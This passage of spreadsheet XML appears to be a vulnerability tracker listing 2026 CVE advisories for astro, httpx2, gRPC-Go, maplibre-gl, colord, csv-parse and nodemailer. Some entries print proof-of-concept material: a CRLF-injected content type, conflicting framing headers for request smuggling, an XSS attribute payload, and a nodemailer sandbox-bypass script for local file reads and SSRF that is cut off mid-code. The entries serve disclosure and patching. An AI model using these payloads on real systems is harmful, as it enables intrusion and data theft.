In v3 &amp; v4, merge is enabled by default. So, the severity score is higher.</t></is></c><c r="T1639" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84375</t></is></c></row><row r="1640"><c r="A1640" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1640" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1640" s="5" t="inlineStr"><is><t>CVE-2026-84376</t></is></c><c r="D1640" s="5" t="inlineStr" /><c r="E1640" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1640" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1640" s="5" t="inlineStr" /><c r="H1640" s="5" t="n"><v>0.004</v></c><c r="I1640" s="5" t="inlineStr" /><c r="J1640" s="5" t="inlineStr" /><c r="K1640" s="5" t="inlineStr" /><c r="L1640" s="5" t="inlineStr"><is><t>npm:astro</t></is></c><c r="M1640" s="5" t="inlineStr"><is><t>7.2.4</t></is></c><c r="N1640" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1640" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1640" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1640" s="5" t="inlineStr" /><c r="R1640" s="5" t="inlineStr" /><c r="S1640" s="5" t="inlineStr"><is><t>## Summary

Astro stripped a configured `base` path from request pathnames using a string-prefix check that did not verify a path-segment boundary. With `base: "/app"`, a request to `/appX/admin` was treated as being under the base and resolved internally to the `/admin` route, while middleware still observed the public pathname `/appX/admin`. Middleware that authorizes routes by inspecting `context.url.pathname` could therefore be bypassed.

## Impact

An unauthenticated remote attacker can bypass pathname-based middleware authorization in applications that:

- Configure a non-root `base`.
- Protect base-prefixed routes in middleware using `context.url.pathname`.

Because routing and middleware resolved different effective pathnames, a request such as `/appX/admin` (or other single-character extensions like `/app2/admin` or `/app-/admin`) reached the protected `/admin` route without passing the middleware check that guards `/app/admin`. Astro's authentication guide demonstrates protecting routes in middleware via `context.url.pathname`, so this is a reasonable and expected pattern.

## Affected versions

`astro` &lt;= 7.2.3.

## Patches

Fixed in `astro` 7.2.4. Base stripping now requires the pathname to equal the base without its trailing slash, or to be followed by a `/`, so a prefix that does not end on a path-segment boundary is no longer treated as being under the base. Routing and `context.url.pathname` now resolve the same pathname.

## Workarounds

Upgrade to `astro` 7.2.4 or later. As a mitigation before upgrading, avoid relying solely on prefix checks of `context.url.pathname` for authorization, or reject requests whose pathname does not begin with the configured base followed by a path-segment boundary.

## Credits

Reported by @Ryoga-exe.</t></is></c><c r="T1640" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84376</t></is></c></row><row r="1641"><c r="A1641" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1641" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1641" s="5" t="inlineStr"><is><t>CVE-2026-84378</t></is></c><c r="D1641" s="5" t="inlineStr" /><c r="E1641" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1641" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1641" s="5" t="inlineStr" /><c r="H1641" s="5" t="n"><v>0.003</v></c><c r="I1641" s="5" t="inlineStr" /><c r="J1641" s="5" t="inlineStr" /><c r="K1641" s="5" t="inlineStr" /><c r="L1641" s="5" t="inlineStr"><is><t>PyPI:httpx2</t></is></c><c r="M1641" s="5" t="inlineStr"><is><t>2.10.0</t></is></c><c r="N1641" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1641" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1641" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1641" s="5" t="inlineStr" /><c r="R1641" s="5" t="inlineStr" /><c r="S1641" s="5" t="inlineStr"><is><t>### Summary

HTTPX2's Server-Sent Events (SSE) parser repeatedly copied and rescanned buffered text when a server split one unterminated line across many response chunks. The total work grows quadratically with the length of the line. An attacker-controlled or compromised SSE endpoint can exploit this behavior to consume excessive client CPU.

### Details

Before version 2.10.0, HTTPX2 combined the complete pending SSE line with each newly received chunk and then scanned the combined text for line separators. If an SSE server sends a long line as many small chunks without a line separator, every chunk causes all previously received text to be copied and scanned again. For `n` fixed-size chunks, this results in O(n²) processing.

The behavior affects both `httpx2.Client.sse()` and `httpx2.AsyncClient.sse()`. Other response APIs do not use the SSE parsing path.

### Impact

Applications that consume SSE from an attacker-controlled or compromised endpoint can experience excessive CPU usage. A crafted stream can block a synchronous worker or the asynchronous event loop that is consuming it, degrading availability for other work in that process. Confidentiality and integrity are not affected.

### Mitigation

Upgrade to HTTPX2 2.10.0 or later. SSE parsing now accumulates incomplete line fragments and combines them only when necessary, making processing linear in the amount of received data. HTTPX2 2.10.0 also limits buffered SSE events to 1 MiB by default through `max_event_size`.

If upgrading is not immediately possible, only consume SSE from trusted endpoints and enforce an external size or time budget on the stream.</t></is></c><c r="T1641" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84378</t></is></c></row><row r="1642"><c r="A1642" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1642" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1642" s="5" t="inlineStr"><is><t>CVE-2026-84379</t></is></c><c r="D1642" s="5" t="inlineStr" /><c r="E1642" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1642" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1642" s="5" t="inlineStr" /><c r="H1642" s="5" t="n"><v>0.003</v></c><c r="I1642" s="5" t="inlineStr" /><c r="J1642" s="5" t="inlineStr" /><c r="K1642" s="5" t="inlineStr" /><c r="L1642" s="5" t="inlineStr"><is><t>PyPI:httpx2</t></is></c><c r="M1642" s="5" t="inlineStr"><is><t>2.11.0</t></is></c><c r="N1642" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1642" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1642" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1642" s="5" t="inlineStr" /><c r="R1642" s="5" t="inlineStr" /><c r="S1642" s="5" t="inlineStr"><is><t>### Summary

HTTPX2 serializes the per-file `Content-Type` and custom headers supplied through the `files=` tuple API directly into the `multipart/form-data` body without validating custom header names or values. An attacker who can influence upload metadata passed to HTTPX2 can use CR or LF characters to terminate a multipart part header and inject additional part headers or end the part header block early.

### Details

The three-element file tuple accepts `(filename, content, content_type)`, and the four-element form accepts `(filename, content, content_type, headers)`. `FileField.render_headers()` interpolates the supplied header names and values between CRLF delimiters without validating them.

For example:

```python
import httpx2

request = httpx2.Request(
    "POST",
    "https://example.com/upload",
    headers={"Content-Type": "multipart/form-data; boundary=BOUNDARY"},
    files={
        "file": (
            "safe.txt",
            b"payload",
            "text/plain\r\nX-Injected: true",
        )
    },
)

print(request.read().decode())
```

The generated body contains an attacker-injected part header:

```text
--BOUNDARY
Content-Disposition: form-data; name="file"; filename="safe.txt"
Content-Type: text/plain
X-Injected: true

payload
--BOUNDARY--
```

The same issue affects names and values in the custom header mapping from the four-element tuple.

Field names and filenames are serialized through a separate escaping path and do not permit CRLF header injection.

### Impact

Applications are affected when they pass attacker-controlled upload metadata into the per-file `content_type` or custom `headers` arguments. The receiving server interprets injected lines as genuine multipart part headers. Depending on how that server validates and processes uploads, this can alter part semantics or bypass checks based on part headers.

This does not split the outer HTTP request: the injected headers are contained within the multipart body. The concrete security impact therefore depends on the downstream multipart parser and application behavior.

### Mitigation

Upgrade to HTTPX2 `2.11.0` or later. Patched versions reject forbidden control characters in multipart part header names and values and raise `ValueError` before serializing the request.

If upgrading is not immediately possible, applications should validate custom multipart header names as HTTP field-name tokens. They should reject NUL, CR, LF, other C0 controls except horizontal tab, and DEL in per-file content types and custom header values before passing them to HTTPX2.</t></is></c><c r="T1642" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84379</t></is></c></row><row r="1643"><c r="A1643" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1643" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1643" s="5" t="inlineStr"><is><t>CVE-2026-84380</t></is></c><c r="D1643" s="5" t="inlineStr" /><c r="E1643" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1643" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1643" s="5" t="inlineStr" /><c r="H1643" s="5" t="n"><v>0.002</v></c><c r="I1643" s="5" t="inlineStr" /><c r="J1643" s="5" t="inlineStr" /><c r="K1643" s="5" t="inlineStr" /><c r="L1643" s="5" t="inlineStr"><is><t>PyPI:httpx2</t></is></c><c r="M1643" s="5" t="inlineStr"><is><t>2.11.0</t></is></c><c r="N1643" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1643" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1643" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1643" s="5" t="inlineStr" /><c r="R1643" s="5" t="inlineStr" /><c r="S1643" s="5" t="inlineStr"><is><t>### Summary

HTTPX2 can automatically add a `Content-Length` header to a request that already contains a caller-supplied `Transfer-Encoding` header. The resulting HTTP/1.1 request contains both framing headers, which can create an ambiguous message boundary and enable request smuggling or connection desynchronization when processed by intermediaries that disagree about which header takes precedence.

### Details

When a request body has a known size, HTTPX2's content encoder returns a default `Content-Length`. `Request._prepare()` applies each default header with `setdefault()`, which only checks whether that same header is already present. It does not check whether the mutually exclusive `Transfer-Encoding` header is present.

For example:

```python
import httpx2

request = httpx2.Request(
    "POST",
    "http://example.com/",
    headers={"Transfer-Encoding": "chunked"},
    content=b"test 123",
)

print(request.headers)
```

The request contains both:

```text
Transfer-Encoding: chunked
Content-Length: 8
```

On an HTTP/1.1 connection, the body is serialized using chunked transfer coding while both headers are sent on the wire. This violates HTTP message-framing requirements. Fixed-size byte, JSON, form, and known-length multipart bodies can reach the affected path.

Streaming bodies with an explicit `Content-Length` are not affected in current HTTPX2 releases because the automatically generated `Transfer-Encoding` is already suppressed in that direction.

### Impact

An attacker may be able to use the conflicting framing headers as a request-smuggling or desynchronization primitive. Exploitation requires an application to pass attacker-controlled request framing headers and associated body data to HTTPX2, use HTTP/1.1, and communicate through a proxy or origin that accepts conflicting headers and interprets them differently from another hop.

Depending on the downstream infrastructure, successful exploitation could interfere with requests sharing a persistent connection, bypass front-end routing or authorization decisions, or poison responses or caches. Applications that do not forward attacker-controlled `Transfer-Encoding` headers are not directly exposed.

### Mitigation

Upgrade to HTTPX2 `2.11.0` or later. Patched versions treat `Content-Length` and `Transfer-Encoding` as mutually exclusive when applying automatically generated request headers.

If upgrading is not immediately possible, remove `Transfer-Encoding` and other hop-by-hop framing headers from untrusted input before constructing outbound requests. Applications acting as proxies should derive outbound framing from the body rather than forwarding inbound `Content-Length` or `Transfer-Encoding` headers.</t></is></c><c r="T1643" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84380</t></is></c></row><row r="1644"><c r="A1644" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1644" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1644" s="5" t="inlineStr"><is><t>CVE-2026-84381</t></is></c><c r="D1644" s="5" t="inlineStr" /><c r="E1644" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1644" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1644" s="5" t="inlineStr" /><c r="H1644" s="5" t="n"><v>0.001</v></c><c r="I1644" s="5" t="inlineStr" /><c r="J1644" s="5" t="inlineStr" /><c r="K1644" s="5" t="inlineStr" /><c r="L1644" s="5" t="inlineStr"><is><t>PyPI:httpcore2, PyPI:httpx2</t></is></c><c r="M1644" s="5" t="inlineStr"><is><t>2.10.0</t></is></c><c r="N1644" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1644" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1644" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1644" s="5" t="inlineStr" /><c r="R1644" s="5" t="inlineStr" /><c r="S1644" s="5" t="inlineStr"><is><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is></c><c r="T1644" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84381</t></is></c></row><row r="1645"><c r="A1645" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1645" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1645" s="5" t="inlineStr"><is><t>CVE-2026-84382</t></is></c><c r="D1645" s="5" t="inlineStr" /><c r="E1645" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1645" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1645" s="5" t="inlineStr" /><c r="H1645" s="5" t="n"><v>0.004</v></c><c r="I1645" s="5" t="inlineStr" /><c r="J1645" s="5" t="inlineStr" /><c r="K1645" s="5" t="inlineStr" /><c r="L1645" s="5" t="inlineStr"><is><t>PyPI:httpx2</t></is></c><c r="M1645" s="5" t="inlineStr"><is><t>2.12.0</t></is></c><c r="N1645" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1645" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1645" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1645" s="5" t="inlineStr" /><c r="R1645" s="5" t="inlineStr" /><c r="S1645" s="5" t="inlineStr"><is><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is></c><c r="T1645" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84382</t></is></c></row><row r="1646"><c r="A1646" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1646" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1646" s="5" t="inlineStr"><is><t>CVE-2026-84445</t></is></c><c r="D1646" s="5" t="inlineStr" /><c r="E1646" s="5" t="inlineStr" /><c r="F1646" s="5" t="inlineStr" /><c r="G1646" s="5" t="inlineStr" /><c r="H1646" s="5" t="n"><v>0.007</v></c><c r="I1646" s="5" t="inlineStr" /><c r="J1646" s="5" t="inlineStr" /><c r="K1646" s="5" t="inlineStr" /><c r="L1646" s="5" t="inlineStr"><is><t>Go:google.golang.org/grpc</t></is></c><c r="M1646" s="5" t="inlineStr"><is><t>1.82.2, 1.83.2, 1.85.0-dev.0.20260825072537-93e31b48545e</t></is></c><c r="N1646" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1646" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1646" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1646" s="5" t="inlineStr" /><c r="R1646" s="5" t="inlineStr" /><c r="S1646" s="5" t="inlineStr"><is><t>A vulnerability exists in gRPC-Go servers configured with `xds.NewGRPCServer()` where a crafted request missing both `:authority` and `Host` headers can cause a server panic, resulting in a Denial of Service (DoS).

Servers built with `xds.NewGRPCServer` install an xDS routing interceptor on every RPC. This interceptor looks up the request’s `:authority` header to pick a virtual host. The HTTP/2 server transport previously accepted requests that had neither `:authority` nor `Host`. When this happened, the xDS routing interceptor attempted to access the first element of an empty slice of authorities, leading to an index out of bounds panic. Since the per-RPC goroutine does not recover from panics, the entire server process would terminate.

This panic occurs in the interceptor pipeline, meaning the transport credentials handshake (TLS, mTLS, or ALTS) and HTTP/2 connection establishment must complete successfully before the crafted request can reach this logic.
- Insecure/Standard TLS: If the server permits insecure (plaintext) connections or standard credentials (where client certs are not checked), any unauthenticated remote attacker can trigger the crash.
- mTLS / ALTS: If strict transport-level authentication is enforced at the network edge or transport layer (e.g., requiring a valid client certificate), the attacker must possess valid transport credentials to initiate the stream and trigger the panic.

### Impact
An attacker can cause a complete outage of the gRPC server by sending a request missing both `:authority` and `Host` headers, provided they can successfully establish a transport connection.

### Patches
The issue has been addressed in `master` (and backported to `1.83.2` and `1.82.2`). The fix updates the HTTP/2 transport layer to reject requests missing both `:authority` and `Host` headers early, maintaining consistency with and other gRPC language implementations.</t></is></c><c r="T1646" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84445</t></is></c></row><row r="1647"><c r="A1647" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1647" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1647" s="5" t="inlineStr"><is><t>CVE-2026-84452</t></is></c><c r="D1647" s="5" t="inlineStr" /><c r="E1647" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1647" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1647" s="5" t="inlineStr" /><c r="H1647" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1647" s="5" t="inlineStr" /><c r="J1647" s="5" t="inlineStr" /><c r="K1647" s="5" t="inlineStr" /><c r="L1647" s="5" t="inlineStr"><is><t>PyPI:winml-cli</t></is></c><c r="M1647" s="5" t="inlineStr"><is><t>0.4.0</t></is></c><c r="N1647" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1647" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1647" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1647" s="5" t="inlineStr" /><c r="R1647" s="5" t="inlineStr" /><c r="S1647" s="5" t="inlineStr"><is><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is></c><c r="T1647" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84452</t></is></c></row><row r="1648"><c r="A1648" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1648" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1648" s="5" t="inlineStr"><is><t>CVE-2026-85061</t></is></c><c r="D1648" s="5" t="inlineStr" /><c r="E1648" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F1648" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1648" s="5" t="inlineStr" /><c r="H1648" s="5" t="n"><v>0.003</v></c><c r="I1648" s="5" t="inlineStr" /><c r="J1648" s="5" t="inlineStr" /><c r="K1648" s="5" t="inlineStr" /><c r="L1648" s="5" t="inlineStr"><is><t>npm:maplibre-gl</t></is></c><c r="M1648" s="5" t="inlineStr"><is><t>6.4.1</t></is></c><c r="N1648" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1648" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1648" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1648" s="5" t="inlineStr" /><c r="R1648" s="5" t="inlineStr" /><c r="S1648" s="5" t="inlineStr"><is><t>### Impact
`DOM.sanitize()` in `src/util/dom.ts` iterated `elem.attributes` (a live `NamedNodeMap`) while calling `elem.removeAttribute()` in the same loop. Removing an attribute shifts subsequent attributes down by one index, causing the iterator to skip the adjacent attribute.

An attacker can provide an HTML payload with consecutive dangerous attributes (such as `&lt;details open onload="1" ontoggle="..."&gt;`). The first attribute is stripped while the second survives and executes upon insertion into `innerHTML` via the attribution control without requiring user interaction (zero-click XSS).

Applications rendering untrusted/third-party style attribution strings or user-supplied custom attributions are impacted.

### Patches
The issue has been resolved by creating a static snapshot of attributes using `Array.from(elem.attributes)` before iteration. Please upgrade to `maplibre-gl` version **6.4.1** (or latest).

### Workarounds
Sanitizing the attribute field of a source before passing it down to maplibre</t></is></c><c r="T1648" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85061</t></is></c></row><row r="1649"><c r="A1649" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1649" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1649" s="5" t="inlineStr"><is><t>CVE-2026-85062</t></is></c><c r="D1649" s="5" t="inlineStr" /><c r="E1649" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1649" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1649" s="5" t="inlineStr" /><c r="H1649" s="5" t="n"><v>0.003</v></c><c r="I1649" s="5" t="inlineStr" /><c r="J1649" s="5" t="inlineStr" /><c r="K1649" s="5" t="inlineStr" /><c r="L1649" s="5" t="inlineStr"><is><t>npm:colord</t></is></c><c r="M1649" s="5" t="inlineStr"><is><t>2.9.4</t></is></c><c r="N1649" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1649" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1649" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1649" s="5" t="inlineStr" /><c r="R1649" s="5" t="inlineStr" /><c r="S1649" s="5" t="inlineStr"><is><t>### Impact

`colord`'s CSS color string matchers described a number as `([+-]?\d*\.?\d+)`. In that form `\d*` and `\d+` can match the same digits, so a run of *n* digits can be divided between them in O(n²) ways, and rejecting an input retries every division. Parsing is synchronous and uninterruptible, so a long malformed color string blocks the thread:

| input | time to reject |
| --- | --- |
| 16 KB | 224 ms |
| 64 KB | 4.4 s |
| 128 KB | 18.5 s |

Reachable through `colord()` and `getFormat()`, and through any method that accepts a color string — including `isEqual()`, `mix()` and `contrast()`. The affected matchers are `parseRgbaString` and `parseHslaString` (built in) and `parseHwbaString`, `parseLchaString`, `parseCmykaString` (plugins).

Growth is polynomial, not exponential — multi-kilobyte payloads are required for a noticeable stall.

### Who is affected

Applications that pass attacker-controlled strings of unbounded length to `colord()` — for example a server validating a color taken from a request body, JSON field, or uploaded stylesheet. `colord` applies no length limit before matching.

Typical client-side use with short input is not meaningfully affected.

### Patches

Fixed in **2.9.4**. The number is now written as `([+-]?(?:\d*\.\d+|\d+))`, which accepts exactly the same syntax but leaves only one way to match it, making rejection linear — 1 MB of input is rejected in ~5 ms.

### Workarounds

Reject or truncate color strings longer than a sane limit (e.g. 100 characters) before passing them to `colord`.</t></is></c><c r="T1649" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85062</t></is></c></row><row r="1650"><c r="A1650" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1650" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1650" s="5" t="inlineStr"><is><t>CVE-2026-85063</t></is></c><c r="D1650" s="5" t="inlineStr" /><c r="E1650" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1650" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1650" s="5" t="inlineStr" /><c r="H1650" s="5" t="n"><v>0.003</v></c><c r="I1650" s="5" t="inlineStr" /><c r="J1650" s="5" t="inlineStr" /><c r="K1650" s="5" t="inlineStr" /><c r="L1650" s="5" t="inlineStr"><is><t>npm:csv-parse</t></is></c><c r="M1650" s="5" t="inlineStr"><is><t>7.0.2</t></is></c><c r="N1650" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1650" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1650" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1650" s="5" t="inlineStr" /><c r="R1650" s="5" t="inlineStr" /><c r="S1650" s="5" t="inlineStr"><is><t>### Impact
With columns: true and group_columns_by_name: true, a duplicated __proto__  header causes the duplicate-column branch to assign an array to obj['__proto__'], invoking the __proto__ setter and replacing the parsed record object's prototype with attacker-controlled data. Fixed in 7.0.2 (Object.hasOwn duplicate check + Object.defineProperty assignment).

### Patches
The problem been patched.

### Workarounds
Disable usage of both the columns and  group_columns_by_name options.

### References
issue #496, PR #497</t></is></c><c r="T1650" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85063</t></is></c></row><row r="1651"><c r="A1651" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1651" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1651" s="5" t="inlineStr"><is><t>CVE-2026-86477</t></is></c><c r="D1651" s="5" t="inlineStr" /><c r="E1651" s="5" t="inlineStr" /><c r="F1651" s="5" t="inlineStr" /><c r="G1651" s="5" t="inlineStr" /><c r="H1651" s="5" t="inlineStr" /><c r="I1651" s="5" t="inlineStr" /><c r="J1651" s="5" t="inlineStr" /><c r="K1651" s="5" t="inlineStr" /><c r="L1651" s="5" t="inlineStr" /><c r="M1651" s="5" t="inlineStr" /><c r="N1651" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1651" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1651" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1651" s="5" t="inlineStr" /><c r="R1651" s="5" t="inlineStr" /><c r="S1651" s="5" t="inlineStr"><is><t>Rejected reason: ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. Reason: This candidate was issued in error. Notes: All references and descriptions in this candidate have been removed to prevent accidental usage.</t></is></c><c r="T1651" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86477</t></is></c></row><row r="1652"><c r="A1652" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1652" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1652" s="5" t="inlineStr"><is><t>CVE-2026-92595</t></is></c><c r="D1652" s="5" t="inlineStr" /><c r="E1652" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1652" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1652" s="5" t="inlineStr" /><c r="H1652" s="5" t="inlineStr" /><c r="I1652" s="5" t="inlineStr" /><c r="J1652" s="5" t="inlineStr" /><c r="K1652" s="5" t="inlineStr" /><c r="L1652" s="5" t="inlineStr"><is><t>npm:nodemailer</t></is></c><c r="M1652" s="5" t="inlineStr"><is><t>9.1.1</t></is></c><c r="N1652" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1652" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1652" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1652" s="5" t="inlineStr" /><c r="R1652" s="5" t="inlineStr" /><c r="S1652" s="5" t="inlineStr"><is><t>### Summary

Nodemailer's `disableFileAccess` / `disableUrlAccess` options are a security sandbox that lets an application forbid untrusted message content (`html`/`text`/attachment `path`/`href`) from reading local files or making outbound HTTP(S) requests. The fix for GHSA-wqvq-jvpq-h66f (commit `5f69497`) threaded these flags through the library's internal resolution paths (`MailMessage.resolveAll()` and `_convertDataImages()`), but the public plugin API `MailMessage.resolveContent(...args)` (`lib/mailer/mail-message.js:41-43`) remains a raw passthrough to `shared.resolveContent()`.

When called with the documented legacy signature `mail.resolveContent(data, key, callback)`, `shared.resolveContent` normalizes the missing options argument to an empty object (`options = options || {}`, `lib/shared/index.js:530`). The message-level flags that the `MailMessage` constructor already copied into `mail.data` (`lib/mailer/mail-message.js:34-38`) are silently discarded, so `resolveContentValue` skips both access-control guards and reaches `nmfetch(url)` (SSRF, `lib/shared/index.js:588`) or `fs.createReadStream(path)` (arbitrary file read, `lib/shared/index.js:597`).

A plugin or application code that resolves message content through the documented API (the same API the library's own `_convertDataImages` uses, threading the flags explicitly) thereby bypasses the sandbox an application deliberately enabled.

### Details

Root cause. The `MailMessage` constructor stores the transporter-level sandbox flags on the message object (`lib/mailer/mail-message.js:34-38`):

```js
['disableFileAccess', 'disableUrlAccess', 'normalizeHeaderKey', 'maxRecipients'].forEach(key =&gt; {
    if (key in options) {
        this.data[key] = options[key];
    }
});
```

The public resolver is a pure passthrough (`lib/mailer/mail-message.js:41-43`):

```js
resolveContent(...args) {
    return shared.resolveContent(...args);
}
```

`shared.resolveContent` supports the legacy 3-argument signature and collapses the missing options to `{}` (`lib/shared/index.js:524-530`):

```js
module.exports.resolveContent = (data, key, options, callback) =&gt; {
    // options is optional; support the legacy resolveContent(data, key, callback) signature
    if (!callback &amp;&amp; typeof options === 'function') {
        callback = options;
        options = false;
    }
    options = options || {};
    ...
    resolveContentValue(data, key, options, callback);
```

`resolveContentValue` then checks `options.disableUrlAccess` / `options.disableFileAccess` (`lib/shared/index.js:581` / `:590`), both `undefined` for the legacy signature, so it falls through to `nmfetch` (`:588`) or `fs.createReadStream` (`:597`).

Contrast with the fixed paths. `resolveAll()` (`lib/mailer/mail-message.js:112-115`) and `_convertDataImages()` (`lib/mailer/index.js:437-440`) both pass the message flags explicitly. The MIME streaming path (`lib/mime-node/index.js:1059-1077`) also honors the flags. So an application that enables the sandbox and then calls `transporter.sendMail()` is protected; the bypass appears only when message content is resolved through the public legacy-signature API — which is the documented plugin usage (the `resolveContent` JSDoc at `lib/shared/index.js:510-523` states it is "useful when you want to create a plugin that needs a content value").

Affected versions. Confirmed on `9.1.0` (HEAD `efd6e29c10c6e0c25c57bd2f2a71302838235a4f`, the current npm latest). The gap was introduced by the GHSA-wqvq-jvpq-h66f fix and is still present; the public API has no regression coverage (`test/mailer/mail-message-test.js` contains no `resolveContent` test).

### PoC

Requires: `nodemailer@9.1.0`, a readable local file, and any reachable HTTP endpoint (loopback suffices). Non-destructive; no network egress beyond a local listener.

```js
'use strict';
const nodemailer = require('nodemailer');
const MailMessage = require('nodemailer/lib/mailer/mail-message');

const TARGET_FILE = '/app/src/package.json';   // any readable local file
const SSRF_URL = 'http://http-sink:8080/poc-ssrf'; // any local/internal HTTP target

const transporter = nodemailer.createTransport({
    streamTransport: true,
    disableFileAccess: true,   // sandbox explicitly enabled
    disableUrlAccess: true
});

const data = {
    from: 'a@example.com', to: 'b@example.com', subject: 'poc', text: 'hello',
    html: { path: TARGET_FILE },
    attachments: [{ filename: 'x.bin', href: SSRF_URL }]
};
const mail = new MailMessage(transporter, data);
// mail.data.disableFileAccess === true, mail.data.disableUrlAccess === true

// Documented legacy plugin signature — options argument omitted:
mail.resolveContent(mail.data, 'html', (err, value) =&gt; {
    if (err) return console.log('BLOCKED', err.code);
